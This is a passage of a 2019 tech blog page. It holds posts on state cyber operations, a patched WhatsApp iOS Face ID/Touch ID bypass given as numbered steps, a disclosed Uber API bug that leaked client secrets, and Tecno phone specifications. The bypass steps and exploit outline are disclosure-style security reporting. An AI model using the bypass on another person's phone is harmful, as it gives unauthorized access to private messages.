employ professionals that specialize in cybersecurity so they can detect unusual activity and minimize damage and disruption.
States Are Far From Immune
As of late, the involvement of various opposing countries in cyber operations is becoming apparent. In fact, according to the Cyber Operations Tracker by the Council on Foreign Relations (CFR), 22 countries are suspected of having sponsored cyber operations, including the United States.
From using cyber operations to cause widespread power outages to hacking and rigging elections, countries and large populations are often the unfortunate victims of cyber threats. Possible tactics by hackers include distributed denial-of-service attacks. Additionally, ransomware aims to disrupt and destabilize government computer networks and systems. In times like these, keeping elections safe and secure should be a top priority for officials. States have also started sanctions and indictments to punish their alleged attacker and/or state-sponsor.
For globalization to effectively survive, we must give cybersecurity due importance. As the world becomes more and more connected, nation states and governing bodies must tighten cyber regulations and invest in security measures. Today, in light of these emerging cyber threats, it is vital to take cybersecurity more seriously than ever before.

Saturday, February 23, 2019

Bug Allows Bypass of Face ID and Touch ID Authentication of WhatsApp iOS version
A Reddit user has discovered a method to bypass recently introduced Face ID and Touch ID authentication for WhatsApp iOS version.
Earlier his month WhatsApp introduced authentication feature for its iOS version allowing users to unlock their phone using Face ID and Touch ID.
Users can enable this feature by going to Settings -> Account -> Privacy -> Screen Lock in WhatsApp. Users can also set a time interval to application lock itself like immediately, after 1 minute, after 15 minutes, or after 1 hour.
Now a Reddit user has discovered a method to bypass this authentication unless the time duration is set to immediately.
According to the user, Face ID and Touch ID authentication can be easily bypassed by using the Share Sheet in iOS. The share sheet allows sharing information from the current context with apps, social media accounts, and other services.
1. Get to the iOS Share Sheet using any method.
2. Click on the WhatsApp icon in iOS Share Sheet.
3. While transitioning to the next screen, you observe that no FaceID or TouchID verification takes place if an option other than “Immediately” was set previously. Now just exit out to the iOS Home Screen. (If in some cases, it asks for FaceID or TouchID verification, just cancel it and try clicking on WhatsApp icon in the iOS Share Sheet again).
4. Now try to open WhatsApp, you will be able to access WhatsApp without FaceID or TouchID authentication.
Whatsapp has already addressed the bug in the latest version of the iOS app released. All iOS users are advised to update their application immediately.
The Bounty Hunter Anand Prakash – Bug Bounty Hunter does it again
Anand Prakash and his colleague at it again managed to unveil the essential API related vulnerability which led to the leakage of client secret and server tokens of all Uber developer applications. Anand Prakash – bug bounty hunter does it again
Anand Prakash, AppSecure is a top-ranked hacker to be precise 4th worldwide and 1st in India on Uber’s bug bounty program. He has earned more than 25 lakhs approx $35000 till date from Uber alone. This is not the first time the bug bounty hunter is doing it either, earlier in 2018 he managed to identify an issue on Tinder allowing them to login into any tinder account.
The bug bounty hunter is also ranked 3rd worldwide and 1st in India on Twitters bug bounty program.
AppSecure led by Anand Prakash and Manisha Sangwan managed to identify an essential API flaw which led to leakage of client secret and server tokens of all Uber developer applications.
According to internet reports, the issue was scrutinized by the Uber engineering team and rewarded them with 3.5 lakhs INR (5000 USD) bounty.
The hackers were able to use the vulnerability which pointed out particularly on riders. Uber within which they could point out public API endpoints of https://riders.uber.com/ . Which the hackers used to see client secret of all Uber applications, the issue has been resolved by Uber by removing the extra response from the API response.

The Uber documentation says:The secret for your application, this should be treated like your application’s password. Never share this with anyone, check this into source code, or post in any public forum. Additionally, this should not be distributed on client devices where users could decompile your code and access the secret. If you suspect your client secret has been compromised you may generate a new one in your application’s dashboard which will immediately invalidate the old secret.
The hackers used to exploit this issue by connecting to any Uber application with his Uber account. Navigate to the vulnerable endpoint to see the leaked data in API response.
How the exploit worked step-by-step
Step #1
Hacker connects to a random Uber developer application to his account using OAuth. IFTTT, Pay fare, Bixby are some of the examples of Uber developer applications. It is not identified as a complicated procedure as of now.
Step #2
Once the hackers connects with the above apps to his Uber account which he/she can use against endpoint to get the developer application’s confidential data. The other significant information of the application using the attacker’s session data.
The vulnerability was reported to Uber on 5th October 2018 by Anand Prakash and Uber agreed to publicly disclose it on February 8th, 2019.

I have got another way of using facebook without paying OTT.. I will never use VPN and. I will never pay OTT

After MTN interrupting in one way i used to loginto Facebook, WhatsApp, Instagram and twitter...... I ...i have designed another way of ysing social Media without paying OTT taxes.

Friday, February 22, 2019

Tecno Camon IClick2 ,Tecno Camon iAce 2XTecno Camon iSky 2,where can i get it here in east Africa?

Rearcno Camon IClick2 smartphone was launched in October 2018. The phone comes with a 6.20-inch touchscreen display
The Tecno Camon IClick2 is powered by octa-core processor and it comes with 4GB of RAM. The phone packs 64GB of internal storage that can be expanded up to 128GB via a microSD card. As far as the cameras are concerned, the Tecno Camon IClick2 packs a 13-megapixel (f/1.8) primary camera and a 5-megapixel secondary camera on the rear and a 24-megapixel front shooter for selfies.
The Tecno Camon IClick2 runs Android 8.1 and is powered by a 3750mAh.
The Tecno Camon IClick2 is a Dual-SIM (GSM and GSM) smartphone that accepts Nano-SIM and Nano-SIM. Connectivity options include Wi-Fi, GPS, Bluetooth, Micro-USB, Active 4G on both SIM cards, 3G and 4G (with support for Band 40 used by some LTE networks in India).
Display6.20-inch
Processorocta-core
Front Camera24-megapixel
RAM4GB
OSAndroid 8.1
Storage64GB
Rear Camera13-megapixel + 5-megapixel
Battery Capacity3750mAh

Tecno Camon IClick2 full specifications

GENERAL

Release dateOctober 2018
Launched in IndiaYes
Thickness7.8
Weight (g)145.00
Battery capacity (mAh)3750
ColoursAqua Blue, Hawaii Blue, Midnight Black

DISPLAY

Screen size (inches)6.20
TouchscreenYes
Aspect ratio19:9

HARDWARE

Processorocta-core
Processor makeMediaTek Helio P22
RAM4GB
Internal storage64GB
Expandable storageYes
Expandable storage typemicroSD
Expandable storage up to (GB)128
Dedicated microSD slotYes

CAMERA

Rear camera13-megapixel (f/1.8) + 5-megapixel
Rear flashLED
Front camera24-megapixel (f/2.0, 1.8-micron)

SOFTWARE

Operating systemAndroid 8.1
SkinHiOS 4.1

CONNECTIVITY

Wi-FiYes
GPSYes
BluetoothYes
Micro-USBYes
Headphones3.5mm
Number of SIMs2
Active 4G on both SIM cardsYes
SIM 1
SIM TypeNano-SIM
GSM/CDMAGSM
3GYes
4G/ LTEYes
Supports 4G in India (Band 40)Yes
SIM 2
SIM TypeNano-SIM
GSM/CDMAGSM
3GYes
4G/ LTEYes
Supports 4G in India (Band 40)Yes

Tecno Camon IClick2 user ratings and reviews

Based on 4 rating(s)
  • 5 Star 
     3
  • 4 Star 
     1
  • 3 Star 
     0
  • 2 Star 
     0
  • 1 Star 
     0
  • Tecno Camon iAce 2X

Tecno Camon iAce 2X
Tecno Camon iAce 2X smartphone was launched in February 2019. The phone comes with a 5.50-inch touchscreen display with a resolution of 720 pixels by 1440 pixels at a PPI of 269 pixels per inch.
The Tecno Camon iAce 2X is powered by 2GHz quad-core processor and it comes with 3GB of RAM. The phone packs 32GB of internal storage that can be expanded up to 128GB via a microSD card. As far as the cameras are concerned, the Tecno Camon iAce 2X packs a 13-megapixel (f/1.8) primary camera and a 0.3-megapixel secondary camera on the rear and a 8-megapixel front shooter for selfies.
The Tecno Camon iAce 2X runs Android 8.1 Oreo and is powered by a 3050mAh. It measures 148.30 x 71.90 x 8.48 (height x width x thickness) .
The Tecno Camon iAce 2X is a Dual-SIM (GSM and GSM) smartphone that accepts Nano-SIM and Nano-SIM. Connectivity options include Wi-Fi, GPS, Bluetooth, Micro-USB, 3G and 4G (with support for Band 40 used by some LTE networks in India). Sensors on the phone include Face unlock, Fingerprint sensor, Compass/ Magnetometer, Proximity sensor and Ambient light sensor.

Display5.50-inch
Processor2GHz quad-core
Front Camera8-megapixel
Resolution720x1440 pixels
RAM3GB
OSAndroid 8.1 Oreo
Storage32GB
Rear Camera13-megapixel + 0.3-megapixel
Battery Capacity3050mAh

Tecno Camon iAce 2X full specifications

GENERAL

Release dateFebruary 2019
Launched in IndiaYes
Form factorTouchscreen
Dimensions (mm)148.30 x 71.90 x 8.48
Battery capacity (mAh)3050
ColoursChampagne Gold, Midnight Black, Nebula Black

DISPLAY

Screen size (inches)5.50
TouchscreenYes
Resolution720x1440 pixels
Aspect ratio18:9
Pixels per inch (PPI)269

HARDWARE

Processor2GHz quad-core
Processor makeMediaTek Helio A22 (MT6761)
RAM3GB
Internal storage32GB
Expandable storageYes
Expandable storage typemicroSD
Expandable storage up to (GB)128
Dedicated microSD slotYes

CAMERA

Rear camera13-megapixel (f/1.8) + 0.3-megapixel
Rear autofocusYes
Rear flashYes
Front camera8-megapixel (f/2.0)
Front flashYes
Tecno Camon iSky 2 full specifications
Tecno Camon iSky 2
Tecno Camon iSky 2 smartphone was launched in August 2018. The phone comes with a 5.50-inch touchscreen display with a resolution of 720 pixels by 1440 pixels. Tecno Camon iSky 2 price in India starts from Rs. 7,199.
The Tecno Camon iSky 2 is powered by 1.5GHz quad-core processor and it comes with 2GB of RAM. The phone packs 16GB of internal storage that can be expanded up to 128GB via a SD card card. As far as the cameras are concerned, the Tecno Camon iSky 2 packs a 13-megapixel primary camera and a 0.3-megapixel secondary camera on the rear and a 13-megapixel front shooter for selfies.
The Tecno Camon iSky 2 runs Android 8.1 and is powered by a 3050mAh.
The Tecno Camon iSky 2 is a Dual-SIM (GSM and GSM) smartphone. Connectivity options include Wi-Fi, Bluetooth, 3G and 4G (with support for Band 40 used by some LTE networks in India). Sensors on the phone include Face unlock, Fingerprint sensor and Accelerometer.
 

Display5.50-inch
Processor1.5GHz quad-core
Front Camera13-megapixel
Resolution720x1440 pixels
RAM2GB
OSAndroid 8.1
Storage16GB
Rear Camera13-megapixel + 0.3-megapixel
Battery Capacity3050mAh
Tecno Camon iSky 2 full specifications

GENERAL

Release dateAugust 2018
Form factorTouchscreen
Battery capacity (mAh)3050
ColoursChampagne Gold, Midnight Black, Bordeaux Red

DISPLAY

Screen size (inches)5.50
TouchscreenYes
Resolution720x1440 pixels
Aspect ratio18:9

HARDWARE

Processor1.5GHz quad-core
Processor makeMediaTek MT6739WW
RAM2GB
Internal storage16GB
Expandable storageYes
Expandable storage typeSD card
Expandable storage up to (GB)128

CAMERA

Rear camera13-megapixel + 0.3-megapixel
Rear flashDual LED
Front camera13-megapixel